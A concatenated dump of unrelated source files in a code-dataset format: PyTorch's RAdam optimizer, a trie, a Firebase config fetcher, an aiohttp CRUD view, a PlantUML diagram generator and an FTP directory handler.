+\\epsilon } \\\\\n &\\hspace{12mm} r_t \\leftarrow\n \\sqrt{\\frac{(\\rho_t-4)(\\rho_t-2)\\rho_{\\infty}}{(\\rho_{\\infty}-4)(\\rho_{\\infty}-2) \\rho_t}} \\\\\n &\\hspace{12mm}\\theta_t \\leftarrow \\theta_t - \\gamma \\widehat{m_t} r_t l_t \\\\\n &\\hspace{6mm}\\textbf{else} \\\\\n &\\hspace{12mm}\\theta_t \\leftarrow \\theta_t - \\gamma \\widehat{m_t} \\\\\n &\\rule{110mm}{0.4pt} \\\\[-1.ex]\n &\\bf{return} \\: \\theta_t \\\\[-1.ex]\n &\\rule{110mm}{0.4pt} \\\\[-1.ex]\n \\end{aligned}\n\n For further details regarding the algorithm we refer to `On the variance of the adaptive learning rate and beyond`_.\n\n This implementation provides an option to use either the original weight_decay implementation as in Adam\n (where the weight_decay is applied to the gradient) or the one from AdamW (where weight_decay is applied\n to the weight) through the decoupled_weight_decay option. When decoupled_weight_decay is set to False\n (default), it uses the original Adam style weight decay, otherwise, it uses the AdamW style which\n corresponds more closely to the `author's implementation`_ in the RAdam paper. Further information\n about decoupled weight decay can be found in `Decoupled Weight Decay Regularization`_.\n\n \"\"\" + fr\"\"\"\n Args:\n params (iterable): iterable of parameters to optimize or dicts defining\n parameter groups\n lr (float, optional): learning rate (default: 1e-3)\n betas (Tuple[float, float], optional): coefficients used for computing\n running averages of gradient and its square (default: (0.9, 0.999))\n eps (float, optional): term added to the denominator to improve\n numerical stability (default: 1e-8)\n weight_decay (float, optional): weight decay (L2 penalty) (default: 0)\n decoupled_weight_decay (bool, optional): whether to use decoupled weight\n decay as in AdamW to obtain RAdamW (default: False)\n {_foreach_doc}\n {_differentiable_doc}\n\n .. 
_On the variance of the adaptive learning rate and beyond:\n https://arxiv.org/abs/1908.03265\n .. _author's implementation:\n https://github.com/LiyuanLucasLiu/RAdam\n .. _Decoupled Weight Decay Regularization:\n https://arxiv.org/abs/1711.05101\n\n \"\"\"\n\n\ndef radam(\n params: List[Tensor],\n grads: List[Tensor],\n exp_avgs: List[Tensor],\n exp_avg_sqs: List[Tensor],\n state_steps: List[Tensor],\n # kwonly args with defaults are not supported by functions compiled with torchscript issue #70627\n # setting this as kwarg for now as functional API is compiled by torch/distributed/optim\n decoupled_weight_decay: bool = False,\n foreach: Optional[bool] = None,\n differentiable: bool = False,\n has_complex: bool = False,\n *,\n beta1: float,\n beta2: float,\n lr: float,\n weight_decay: float,\n eps: float,\n):\n r\"\"\"Functional API that performs RAdam algorithm computation.\n\n See :class:`~torch.optim.RAdam` for details.\n \"\"\"\n\n if not all(isinstance(t, torch.Tensor) for t in state_steps):\n raise RuntimeError(\n \"API has changed, `state_steps` argument must contain a list of singleton tensors\"\n )\n\n if foreach is None:\n _, foreach = _default_to_fused_or_foreach(params, differentiable, use_fused=False)\n\n if foreach and torch.jit.is_scripting():\n raise RuntimeError(\"torch.jit.script not supported with foreach optimizers\")\n\n if foreach and not torch.jit.is_scripting():\n func = _multi_tensor_radam\n else:\n func = _single_tensor_radam\n\n func(\n params,\n grads,\n exp_avgs,\n exp_avg_sqs,\n state_steps,\n beta1=beta1,\n beta2=beta2,\n lr=lr,\n weight_decay=weight_decay,\n eps=eps,\n decoupled_weight_decay=decoupled_weight_decay,\n differentiable=differentiable,\n has_complex=has_complex,\n )\n\n\ndef _single_tensor_radam(\n params: List[Tensor],\n grads: List[Tensor],\n exp_avgs: List[Tensor],\n exp_avg_sqs: List[Tensor],\n state_steps: List[Tensor],\n *,\n beta1: float,\n beta2: float,\n lr: float,\n weight_decay: float,\n eps: float,\n differentiable: bool,\n decoupled_weight_decay: bool,\n has_complex: bool,\n):\n\n for i, param in enumerate(params):\n grad = grads[i]\n exp_avg = exp_avgs[i]\n exp_avg_sq = exp_avg_sqs[i]\n step_t = state_steps[i]\n\n if torch.is_complex(param):\n param = torch.view_as_real(param)\n grad = torch.view_as_real(grad)\n exp_avg = torch.view_as_real(exp_avg)\n exp_avg_sq = torch.view_as_real(exp_avg_sq)\n\n # update step\n step_t += 1\n step = _get_value(step_t)\n\n bias_correction1 = 1 - beta1 ** step\n bias_correction2 = 1 - beta2 ** step\n\n if weight_decay != 0:\n if decoupled_weight_decay:\n param.mul_(1 - lr * weight_decay)\n else:\n grad = grad.add(param, alpha=weight_decay)\n\n # Decay the first and second moment running average coefficient\n exp_avg.lerp_(grad, 1 - beta1)\n exp_avg_sq.mul_(beta2).addcmul_(grad, grad, value=1 - beta2)\n\n # correcting bias for the first moving moment\n bias_corrected_exp_avg = exp_avg / bias_correction1\n\n # maximum length of the approximated SMA\n rho_inf = 2 / (1 - beta2) - 1\n # compute the length of the approximated SMA\n rho_t = rho_inf - 2 * step * (beta2 ** step) / bias_correction2\n\n if rho_t > 5.0:\n # Compute the variance rectification term and update parameters accordingly\n rect = math.sqrt(\n (rho_t - 4)\n * (rho_t - 2)\n * rho_inf\n / ((rho_inf - 4) * (rho_inf - 2) * rho_t)\n )\n exp_avg_sq_sqrt = exp_avg_sq.sqrt()\n if differentiable:\n exp_avg_sq_sqrt = exp_avg_sq_sqrt.add(eps)\n else:\n exp_avg_sq_sqrt = exp_avg_sq_sqrt.add_(eps)\n adaptive_lr = math.sqrt(bias_correction2) / 
exp_avg_sq_sqrt\n param.add_(bias_corrected_exp_avg * lr * adaptive_lr * rect, alpha=-1.0)\n else:\n param.add_(bias_corrected_exp_avg * lr, alpha=-1.0)\n\n\ndef _multi_tensor_radam(\n params: List[Tensor],\n grads: List[Tensor],\n exp_avgs: List[Tensor],\n exp_avg_sqs: List[Tensor],\n state_steps: List[Tensor],\n *,\n beta1: float,\n beta2: float,\n lr: float,\n weight_decay: float,\n eps: float,\n decoupled_weight_decay: bool,\n differentiable: bool,\n has_complex: bool,\n):\n\n if len(params) == 0:\n return\n\n assert not differentiable, \"_foreach ops don't support autograd\"\n\n grouped_tensors = Optimizer._group_tensors_by_device_and_dtype([params, grads, exp_avgs, exp_avg_sqs, state_steps])\n for ((\n grouped_params,\n grouped_grads,\n grouped_exp_avgs,\n grouped_exp_avg_sqs,\n grouped_state_steps,\n ), _) in grouped_tensors.values():\n # Update steps\n # If steps are on CPU, foreach will fall back to the slow path, which is a for-loop calling t.add(1) over\n # and over. 1 will then be wrapped into a Tensor over and over again, which is slower than if we just\n # wrapped it once now. The alpha is required to assure we go to the right overload.\n if grouped_state_steps[0].is_cpu:\n torch._foreach_add_(grouped_state_steps, torch.tensor(1.0, device='cpu'), alpha=1.0)\n else:\n torch._foreach_add_(grouped_state_steps, 1)\n\n if has_complex:\n _view_as_real(grouped_params, grouped_grads, grouped_exp_avgs, grouped_exp_avg_sqs)\n\n # maximum length of the approximated SMA\n rho_inf = 2 / (1 - beta2) - 1\n # compute the length of the approximated SMA\n rho_t_list = [rho_inf - 2 * _get_value(step) * (beta2 ** _get_value(step)) /\n (1 - beta2 ** _get_value(step)) for step in grouped_state_steps]\n\n if weight_decay != 0:\n if decoupled_weight_decay:\n torch._foreach_mul_(grouped_params, 1 - lr * weight_decay)\n else:\n grouped_grads = torch._foreach_add(grouped_grads, grouped_params, alpha=weight_decay)\n\n # Decay the first and second moment running average coefficient\n torch._foreach_lerp_(grouped_exp_avgs, grouped_grads, 1 - beta1)\n\n torch._foreach_mul_(grouped_exp_avg_sqs, beta2)\n torch._foreach_addcmul_(grouped_exp_avg_sqs, grouped_grads, grouped_grads, 1 - beta2)\n\n # Delete the local intermediate since it won't be used anymore to save on peak memory\n del grouped_grads\n\n rect = [\n _dispatch_sqrt(\n (rho_t - 4)\n * (rho_t - 2)\n * rho_inf\n / ((rho_inf - 4) * (rho_inf - 2) * rho_t)\n )\n if rho_t > 5\n else 0\n for rho_t in rho_t_list\n ]\n unrectified = [0 if rect > 0 else 1.0 for rect in rect]\n\n bias_correction1 = [1 - beta1 ** _get_value(step) for step in grouped_state_steps]\n unrect_step_size = _stack_if_compiling([(lr * rect / bc) * -1 for rect, bc in zip(unrectified, bias_correction1)])\n bias_correction2_sqrt_times_rect_step_size = [\n _dispatch_sqrt(1 - beta2 ** _get_value(step)) * (lr * rect / bc) * -1\n for step, rect, bc in zip(grouped_state_steps, rect, bias_correction1)\n ]\n\n buffer = torch._foreach_sqrt(grouped_exp_avg_sqs)\n torch._foreach_add_(buffer, eps)\n torch._foreach_div_(buffer, bias_correction2_sqrt_times_rect_step_size)\n torch._foreach_reciprocal_(buffer)\n torch._foreach_add_(buffer, unrect_step_size)\n\n # Here, buffer = sqrt(1 - beta2^t) * rect_step_size / (sqrt(v) + eps) + unrect_step_size\n torch._foreach_addcmul_(grouped_params, grouped_exp_avgs, 
buffer)\n","repo_name":"pytorch/pytorch","sub_path":"torch/optim/radam.py","file_name":"radam.py","file_ext":"py","file_size_in_byte":17154,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"37879207227","text":"from typing import Tuple\n\n\nclass TrieNode(object):\n \"\"\"\n Our trie node implementation. Very basic. but does the job\n \"\"\"\n\n def __init__(self, word: str):\n self.word = word\n self.children = {}\n # Is it the last character of the word.`\n self.sentence_finished = False\n # How many times this character appeared in the addition process\n self.counter = 1\n\n\ndef add(root, wordlist):\n \"\"\"\n Adding a word in the trie structure\n \"\"\"\n node = root\n for word in wordlist:\n # We did not find it so add a new chlid\n if not node.children.get(word):\n new_node = TrieNode(word)\n node.children[word] = new_node\n # And then point node to the new child\n node = new_node\n # Everything finished. Mark it as the end of a word.\n node.word_finished = True\n\n\ndef find_prefix(root, words) -> Tuple[bool, int]:\n \"\"\"\n Check and return\n 1. If the prefix exsists in any of the words we added so far\n 2. If yes then how may words actually have the prefix\n \"\"\"\n node = root\n # If the root node has no children, then return False.\n # Because it means we are trying to search in an empty trie\n if not root.children:\n return False, 0\n for word in words:\n if node.children.get(word):\n node = node.children[word]\n else:\n return False, 0\n\n # Well, we are here means we have found the prefix. Return true to indicate that\n # And also the counter of the last node. This indicates how many words have this\n # prefix\n return True, node.counter\n\n\nif __name__ == \"__main__\":\n root = TrieNode('*')\n add(root, [\"hello\", \"world\"])\n add(root, ['hello'])\n\n print(find_prefix(root, ['hello']))\n print(find_prefix(root, ['hello', 'world']))\n print(find_prefix(root, ['hackathon']))\n print(find_prefix(root, ['ha']))\n print(find_prefix(root, ['hammer']))\n","repo_name":"atillagenc/zenclass","sub_path":"trie.py","file_name":"trie.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19579064686","text":"import argparse\nimport requests\nimport io\nimport os\nimport httplib2\nimport json\n\nfrom oauth2client.service_account import ServiceAccountCredentials\nfrom googleapiclient.discovery import build\n\n\nPROJECT_ID = os.getenv('PROJECT_ID')\nSCOPES = [\n 'https://www.googleapis.com/auth/firebase.remoteconfig',\n 'https://www.googleapis.com/auth/cloud-platform',\n 'https://www.googleapis.com/auth/cloud-platform.read-only',\n 'https://www.googleapis.com/auth/firebase',\n 'https://www.googleapis.com/auth/firebase.readonly'\n]\n\n# [START retrieve_access_token]\ndef _get_access_token():\n \"\"\"Retrieve a valid access token that can be used to authorize requests.\n :return: Access token.\n \"\"\"\n credentials = ServiceAccountCredentials.from_json_keyfile_name(\n 'service-account.json', SCOPES)\n access_token_info = credentials.get_access_token()\n return access_token_info.access_token\n# [END retrieve_access_token]\n\n\ndef _getConfig():\n \"\"\"Retrieve the current Firebase Config template from server.\n Retrieve the current Firebase Config template from server and store it\n locally.\n \"\"\"\n headers = {\n 'Authorization': 'Bearer ' + _get_access_token()\n }\n credentials = 
ServiceAccountCredentials.from_json_keyfile_name( 'service-account.json', scopes=SCOPES)\n http = httplib2.Http()\n http = credentials.authorize(http)\n service = build(\"firebase\", \"v1beta1\", http=http)\n projects = service.projects().webApps()\n webapps = projects.list(parent=\"projects/{}\".format(PROJECT_ID)).execute()\n webapp_id = webapps[\"apps\"][0][\"appId\"]\n name = \"projects/{}/webApps/{}/config\".format(PROJECT_ID, webapp_id)\n print(\"Getting firebase-config for app {}\".format(name))\n config = projects.getConfig(name=name).execute()\n with open(\"firebase-config.json\", \"w\") as file:\n json.dump(config, file)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--action')\n parser.add_argument('--etag')\n parser.add_argument('--version')\n args = parser.parse_args()\n\n if args.action and args.action == 'getConfig':\n _getConfig()\n else:\n print('''Invalid command. Please use the following command:\npython configure.py --action=getConfig''')\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"tlgevers/firebase-manage","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40786882030","text":"import logging\n\nfrom aiohttp import web\n\nfrom api.dataclasses.trainer import TrainerClass, TrainerSchema\nfrom api.models.trainer import Trainers\n\nfrom marshmallow import Schema, fields\n\nfrom webargs.aiohttpparser import use_args\n\n\nclass GetSchema(Schema):\n name = fields.String(required=True)\n region = fields.String(required=False, default=None, missing='')\n age = fields.Integer(required=False, default=None, missing=0)\n\n\nclass ResponseGetSchema(Schema):\n data = fields.List(\n fields.Nested(TrainerSchema),\n required=True\n )\n\n\nclass TrainersView(web.View):\n\n response = ResponseGetSchema()\n\n async def get(self):\n \"\"\"\n ---\n description: This end-point allows getting trainers\n tags:\n - Trainer\n produces:\n - text/plain\n responses:\n \"200\":\n description: successful operation. 
Return \"trainer\" data\n \"\"\"\n\n session = self.request.app['session_db']\n\n data = session.query(Trainers).all()\n resp = [\n TrainerClass(\n Name=trainer.name,\n Region=trainer.region,\n Age=trainer.age\n )\n for trainer in data]\n\n return web.json_response(self.response.dump(\n {\n 'data': resp\n }\n ))\n\n @use_args(GetSchema(), location=\"query\")\n async def post(self, args):\n \"\"\"\n ---\n description: This end-point allows saving a trainer\n tags:\n - Trainer\n produces:\n - text/plain\n responses:\n \"200\":\n description: successful operation.\n \"\"\"\n try:\n session = self.request.app['session_db']\n new_trainer = Trainers(\n name=args['name'],\n region=args['region'],\n age=args['age']\n )\n session.add(new_trainer)\n session.commit()\n logging.info('Saved successfully')\n\n return web.json_response({'message': 'Saved successfully'})\n\n except Exception as e:\n print(e)\n raise\n\n @use_args(GetSchema(), location=\"query\")\n async def put(self, args):\n \"\"\"\n ---\n description: This end-point allows updating a trainer\n tags:\n - Trainer\n produces:\n - text/plain\n responses:\n \"200\":\n description: successful operation.\n \"\"\"\n try:\n session = self.request.app['session_db']\n\n update_trainer = session.query(Trainers).filter(\n Trainers.name == args[\"name\"]).one()\n update_trainer.age = args[\"age\"]\n session.commit()\n\n logging.info('Updated successfully')\n\n return web.json_response({'message': 'Updated successfully'})\n\n except Exception as e:\n print(e)\n raise\n\n @use_args(GetSchema(), location=\"query\")\n async def delete(self, args):\n \"\"\"\n ---\n description: This end-point allows deleting a trainer\n tags:\n - Trainer\n produces:\n - text/plain\n responses:\n \"200\":\n description: successful operation.\n \"\"\"\n try:\n session = self.request.app['session_db']\n if args[\"name\"]:\n looking_for = '%{0}%'.format(args[\"name\"])\n session.query(Trainers).filter(Trainers.name.like(looking_for)).delete(synchronize_session=False)\n logging.info('Deleted successfully')\n session.commit()\n\n return web.json_response({'message': 'Deleted successfully'})\n\n except Exception as e:\n print(e)\n raise\n","repo_name":"FernandoBLima/python-sample-projects","sub_path":"0.4_PYTHON_SQLALCHEMY_DOCKER/server/api/views/trainers.py","file_name":"trainers.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26393743997","text":"import os\nimport re\nimport subprocess\n\nfrom utilities.util import Util\n\nfrom .linker import Linker\n\nclass Generator:\n\n def __init__( self, arguments ):\n\n #### GLOBALS ################################\n\n self.arguments = arguments\n\n self.files = [ ]\n\n self.output_path = None\n\n ########################################\n\n self.class_header = None\n\n self.template = { }\n\n self.plantuml_script = None\n\n self.tags = {\n 'properties': '',\n 'setters': '__ Setter __',\n 'getters': '__ Getter __',\n 'utilities': '__ Utility __'\n }\n\n #### INITIALIZATION ##########################\n\n self.init ( )\n\n #### INITIATORS ########################################################\n\n def init ( self ):\n\n self.get_files ( )\n\n self.compile ( )\n\n\n def compile ( self ):\n\n for file in self.files:\n\n self.process ( file )\n\n self.render ( file )\n\n\n def process ( self, file ):\n\n self.template = {\n 'class': None,\n 'properties':\n {\n 'names': [ ],\n 'types': [ ]\n },\n 'setters':\n {\n 'names': [ ],\n 'types': [ ]\n },\n 'getters':\n {\n 'names': [ 
],\n 'types': [ ]\n },\n 'utilities':\n {\n 'names': [ ],\n 'types': [ ]\n }\n }\n\n self.get_header ( file )\n\n self.get_class ( file )\n\n self.get_properties ( file )\n\n self.get_mutators ( file )\n\n self.get_utilities ( file )\n\n\n def render ( self, file ):\n\n self.prepare_file ( file )\n\n self.compose_header ( )\n\n self.compose_members ( )\n\n self.compose_footer ( )\n\n self.save_output ( )\n\n self.compose_image ( )\n\n #### GETTERS ########################################################\n\n def get_files ( self ):\n\n source = self.arguments [ 'source' ];\n\n\n if ( Util.is_file ( source ) ): # If: file\n\n self.files.append ( source )\n\n\n if ( Util.is_directory ( source ) ): # If: directory\n\n omissions = Util.get_file_omissions ( self.arguments )\n\n self.files = Util.get_files ( source, '.js', omissions )\n\n\n def get_header ( self, file ):\n\n regex = r'(\\/\\*\\*[^@]+@class[^\\/]+\\/)'\n\n\n with open ( file, 'r' ) as reader:\n\n data = reader.read ( )\n\n\n if re.search ( regex, data ):\n\n self.class_header = re.search ( regex, data ).group ( 1 )\n\n\n def get_class ( self, file ):\n\n regex = r'class\\s*(\\w+)[^{]+{'\n\n\n with open ( file, 'r' ) as reader:\n\n data = reader.read ( )\n\n self.template [ 'class' ] = re.search ( regex, data ).group ( 1 )\n\n\n def get_properties ( self, file ):\n\n if self.class_header:\n\n regex = r'@property\\s*{(.+)}\\s*((\\w+)|\\[(\\w+)=(\\w+)\\]?)'\n\n temp = re.findall ( regex, self.class_header )\n\n\n for value in temp:\n\n self.template [ 'properties' ] [ 'names' ].append ( value [ 1 ] )\n\n self.template [ 'properties' ] [ 'types' ].append ( value [ 0 ] )\n\n else:\n\n regexes = {\n 'start':\n [\n r'class\\s*\\w+'\n ],\n 'close':\n [\n r'\\s{2,4}constructor\\s*\\(',\n r'\\s{2,4}set\\s*\\w+(\\s*?)\\(',\n r'\\s{2,4}get\\s*\\w+(\\s*?)\\('\n ]\n }\n\n bounds = Util.get_file_bounds ( file, regexes )\n\n lines = open ( file ).readlines ( )\n\n lines = lines [ bounds [ 'start' ] : bounds [ 'close' ] ]\n\n\n self.template [ 'properties' ] = Util.filter_properties ( lines )\n\n\n def get_mutators ( self, file ):\n\n data = open ( file, 'r' ).read ( )\n\n\n for mutator in [ 'set', 'get' ]:\n\n mutator_type = mutator + 'ters'\n\n\n # Docstring\n\n regex = r'@param\\s*\\{(\\w+)\\}[^\\/]+\\/[^s]+set\\s(\\w+)' if mutator == 'set' else r'@return\\s*{(\\w+)}[^\\/]+\\/[^g]+get\\s(\\w+)'\n\n mutators = re.findall ( regex, data )\n\n\n for value in mutators:\n\n self.template [ mutator_type ] [ 'names' ].append ( value [ 1 ] )\n\n self.template [ mutator_type ] [ 'types' ].append ( value [ 0 ] )\n\n\n # Vanilla\n\n regex = r'\\s{2,4}' + mutator + r'\\s*(\\w+)\\s*\\([^\\)]+\\)'\n\n mutators = re.findall ( regex, data )\n\n\n for value in mutators:\n\n if value not in self.template [ mutator_type ] [ 'names' ]:\n\n self.template [ mutator_type ] [ 'names' ].append ( value )\n\n self.template [ mutator_type ] [ 'types' ].append ( None )\n\n\n def get_utilities ( self, file ):\n\n data = open ( file, 'r' ).read ( )\n\n\n # Docstring\n\n regex = r'@return\\s*{(\\w+)}[^\\/]+\\/\\s*\\b(?!return\\b|let\\b|this\\b|if\\b|switch\\b|for\\b)(\\w+)\\s*\\([^\\)]+\\)'\n\n utilities = re.findall ( regex, data )\n\n\n for value in utilities:\n\n self.template [ 'utilities' ] [ 'names' ].append ( value [ 1 ] )\n\n self.template [ 'utilities' ] [ 'types' ].append ( value [ 0 ] )\n\n\n # Vanilla\n\n regex = r'\\s{2,4}\\b(?!constructor\\b|return\\b|let\\b|this\\b|if\\b|switch\\b|for\\b)(\\w+)\\s*\\([^\\)]+\\)'\n\n utilities = re.findall ( regex, data )\n\n\n 
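# Add only vanilla (undocumented) methods the docstring pass above did not already record.\n\n 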
for value in utilities:\n\n if value not in self.template [ 'utilities' ] [ 'names' ]:\n\n self.template [ 'utilities' ] [ 'names' ].append ( value )\n\n self.template [ 'utilities' ] [ 'types' ].append ( None )\n\n #### RENDERERS ########################################################\n\n def prepare_file ( self, file ):\n\n self.output_path = Util.set_file ( file, self.arguments [ 'destination'] )\n\n open ( self.output_path, 'w+' )\n\n\n def compose_header ( self ):\n\n header = f\"@startuml\\n\\n\"\n\n\n if 'skin_param' in self.arguments.keys ( ):\n\n for skin_param in self.arguments [ 'skin_param' ]:\n\n header += f\"{skin_param}\\n\"\n\n\n header += \"\\n\"\n\n\n header += f\"class {self.template [ 'class' ]} {{\\n\"\n\n\n self.plantuml_script = header\n\n\n def compose_members ( self ):\n\n members = ''\n\n pad = 3\n\n column_max = Util.get_column_max ( self.template ) + pad\n\n\n for tag_type in self.tags:\n\n members += f\"{self.tags [ tag_type ]}\\n\".lstrip ( )\n\n\n if self.template [ tag_type ] [ 'names' ]:\n\n for i, name in enumerate ( self.template [ tag_type ] [ 'names' ] ):\n\n\n if self.template [ tag_type ] [ 'types' ]:\n\n padding = column_max - len ( name )\n\n type = Util.filter_type ( self.template [ tag_type ] [ 'types' ] [ i ] )\n\n members += f\"{name}{' ' * padding}{type}\\n\" if type else f\"{name}\\n\"\n\n\n self.plantuml_script += members\n\n\n def compose_footer ( self ):\n\n self.plantuml_script += f\"}}\\n\\n@enduml\"\n\n\n def save_output ( self ):\n\n with open ( self.output_path, 'w' ) as writer:\n\n writer.write ( self.plantuml_script )\n\n print ( \">> [ output ] \\n\", f\"{self.output_path}\" )\n\n\n def compose_image ( self ):\n\n if 'plant_path' in self.arguments.keys ( ):\n\n for image_type in self.arguments [ 'make_image' ]:\n\n output_path = f\"{os.path.dirname ( self.output_path )}/images\"\n\n command = f\"java -jar {self.arguments [ 'plant_path' ]} \\\"{self.output_path}\\\" -o \\\"{output_path}\\\" -{image_type}\"\n\n filename = os.path.basename ( self.output_path ).replace ( 'txt', image_type )\n\n\n if Util.is_directory ( output_path ) is False:\n\n os.makedirs ( output_path )\n\n\n subprocess.run ( command, shell=True )\n\n\n print ( f\" {output_path}/{filename}\\n\" )\n","repo_name":"Justin-Byrne/ClassGenerator","sub_path":"source/app/core/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":8421,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"9085562988","text":"from __future__ import print_function\nfrom .shared import log, scheme_lookup, connection\nfrom .__local__ import LocalDirectory\nfrom ftplib import FTP, error_perm, error_temp, all_errors\ntry:\n from urlparse import urlsplit, urlparse #python 2.7\nexcept:\n from urllib.parse import urlsplit, urlparse\n\nimport time\nimport glob\nimport os\ntry:\n from StringIO import StringIO # python 2.7\n _P3 = False\nexcept:\n from io import StringIO, BytesIO # python 3\n _P3 = True\n basestring = (str, bytes)\n\n\nVERBOSE = True\nFORCE = True\n\n\nclass FtpDirectory(LocalDirectory):\n \"\"\" Directory handler with FTP connection \"\"\"\n ftp = None\n\n def __init__(self, url, ftp=None):\n \"\"\" a path to a ftp directory \"\"\"\n url = urlsplit(url) \n if url.scheme:\n if url.scheme not in [\"ftp\",\"sftp\"]:\n raise ValueError(\"scheme must be 'ftp://' for a FtpDirectory\")\n if ftp is None:\n ftp = FTP(url.hostname, url.username, url.password)\n #ftp = FTP(url.hostname)\n ftp.connect(url.hostname, 
url.port or 0)\n if url.username:\n ftp.login(url.username, url.password)\n\n ## store the username in the ftp so it can recovered later\n ftp.username = url.username\n username = url.username\n hostname = url.hostname \n else:\n username = getattr(ftp, \"username\", url.username or \"\")\n hostname = getattr(ftp, \"hostname\", url.hostname or \"\")\n #ftp.connect(url.hostname)\n #ftp.login(url.username, url.password) \n\n directory = url.path[1:] # remove the first '/' so the path \n # is relative to the connection point \n \n ## do not use the url.geturl() method in order to \n ## remove the password from the url representation \n path = '%s://'%url.scheme\n if username:\n path += username + \"@\"\n path += hostname + \"/\" + directory\n \n else:\n if ftp is None:\n raise ValueError(\"if no explicite sceme is present in url, a valid ftp connection must be present\")\n username = getattr(ftp, \"username\", url.username)\n directory = url.path\n path = \"ftp://%s%s/%s\"%(username+\"@\" if username else \"\", ftp.host, directory)\n \n LocalDirectory.__init__(self, path) \n\n self.remotedirectory = directory \n self.ftp = ftp \n\n @property\n def dirname(self):\n return self.remotedirectory\n \n @property\n def isremote(self):\n \"\"\" True if the directory is in remote access \"\"\"\n return True \n\n @property\n def connection(self):\n return connection('ftp', self._get_ftp())\n\n def _get_ftp(self):\n return self.ftp\n\n def login(self, user, password):\n return self._get_ftp().login(user, password)\n\n def put(self, files):\n \"\"\" put files in the directory \n\n files can be a string glob as e.g. \"*.txt\" or a list of file path\n \"\"\"\n ftp = self._get_ftp()\n\n if isinstance(files, basestring):\n files = ls(files) \n\n for file in files:\n with open(file,'rb') as f:\n d, filename = os.path.split(file) \n ftp.storbinary('STOR %s'%os.path.join(self.remotedirectory,filename), f) # send the file\n log.notice(\"file '%s' transfered in '%s' \"%(file, self.directory))\n \n\n def rmtree(self, path):\n \"\"\" remove the subrirectory in path \"\"\"\n ftp = self._get_ftp() \n return ftp_rmtree(ftp, os.path.join(self.remotedirectory, path))\n\n def ls(self, glob='*'):\n \"\"\" list file in directory from glob. e.g. 
'*.txt' \n\n The returned paths are relative \n \"\"\"\n ftp = self._get_ftp() \n glob = ftp_path2path(ftp, glob) \n return remove_roots(ftp_ls(ftp, os.path.join(self.remotedirectory,glob)), self.remotedirectory) \n\n def listdir(self):\n ftp = self._get_ftp()\n return ftp.nlst()\n \n def get(self, files, inside, child=None):\n \"\"\" \n Parameters\n ----------\n files : string\n file glob \n \"\"\"\n child = child or self.fpath\n\n ftp = self._get_ftp()\n files = ftp_path2path(ftp, files) \n return [child(f) for f in ftp_mget(ftp, os.path.join(self.remotedirectory, files), inside)]\n\n if _P3:\n def open(self, file, mode='r'): \n \"\"\" open a file inside directory \"\"\" \n ftp = self._get_ftp()\n file = ftp_path2path(ftp, file)\n #print (\"FTP %s\"% os.path.join(self.remotedirectory, file))\n if 'b' in mode:\n return FtpBytesFile(ftp, os.path.join(self.remotedirectory, file), mode) \n else:\n return FtpFile(ftp, os.path.join(self.remotedirectory, file), mode) \n\n else:\n def open(self, file, mode='r'): \n \"\"\" open a file inside directory \"\"\" \n ftp = self._get_ftp()\n file = ftp_path2path(ftp, file)\n #print (\"FTP %s\"% os.path.join(self.remotedirectory, file))\n return FtpFile(ftp, os.path.join(self.remotedirectory, file), mode) \n\n def getmtime(self,file=''):\n ftp = self._get_ftp()\n file = ftp_path2path(ftp, file)\n\n t = ftp.sendcmd(\"MDTM %s\"%(os.path.join(self.remotedirectory, file)))\n t = time.strptime(t[4:], \"%Y%m%d%H%M%S\")\n return time.mktime(t)\n\n def stat(self, file=''):\n raise RuntimeError(\"Cannot get stat from ftp connection. Modification date only\") \n\n def getatime(self, file=''):\n raise RuntimeError(\"Cannot get access time from ftp connection. Modification date only\") \n\n def getctime(self, file=''):\n raise RuntimeError(\"Cannot get creation time from ftp connection. Modification date only\") \n \n def getsize(self, file=''):\n ftp = self._get_ftp()\n file = ftp_path2path(ftp, file) \n return ftp.size(os.path.join(self.remotedirectory, file))\n #raise RuntimeError(\"Cannot get size from ftp connection. 
Modification date only\") \n \n\n\n def exists(self):\n return self.remotedirectory in self.cd(\"..\").ls()\n\n def has(self, path):\n return path in self.ls() \n \n def append(self, file, strin):\n f = self.open(file)\n f.seek(0,2)\n f.write(strin)\n f.seek(0)\n ftp = self._get_ftp()\n ftp.storbinary('STOR %s'%os.path.join(self.remotedirectory,file), f)\n\n def appendlines(self, file, lines):\n f = self.open(file)\n f.seek(0,2)\n f.writelines(lines)\n f.seek(0)\n ftp = self._get_ftp()\n ftp.storlines('STOR %s'%os.path.join(self.remotedirectory,file), f)\n\n def isfile(self, filename):\n ftp = self._get_ftp()\n filename = ftp_path2path(ftp, filename) \n return ftp_isfile(ftp, os.path.join(self.remotedirectory, filename)) \n\n def isdir(self, dirname):\n ftp = self._get_ftp()\n dirname = ftp_path2path(ftp, dirname)\n return not ftp_isfile(ftp, os.path.join(self.remotedirectory, dirname)) \n\n def _path(self, relpath, ftp):\n ftppath = os.path.join(self.remotedirectory, relpath)\n path = (self,)+relpath\n\n if ftp_isfile(ftp, os.path.join(ftppath)): \n return fpath(*path)\n\n return dpath(*path)\n\n def makedirs(self, d):\n ftp = self._get_ftp()\n d = ftp_path2path(ftp,d) \n ftp_makedirs(ftp, os.path.join(self.remotedirectory,d), True)\n\n def build(self):\n ftp = self._get_ftp()\n ftp_makedirs(ftp, self.remotedirectory, True)\n return \n\n try:\n ftp_makedirs(ftp, self.remotedirectory, True)\n except error_perm as e:\n if \"550\" in str(e)[:4]:\n if ftp_isfile(ftp, self.remotedirectory):\n raise OSError(\"[Errno %d] File exists: '%s'\"%(os.errno.ENOTDIR, self.directory)) \n else:\n raise error_perm(e)\n return self \n \n def check(self):\n ftp = self._get_ftp()\n return ftp_exists(ftp, self.remotedirectory) and not ftp_isfile(ftp, self.remotedirectory)\n\n\n######################################################\n#\n# Record this ftp handler class to the shared 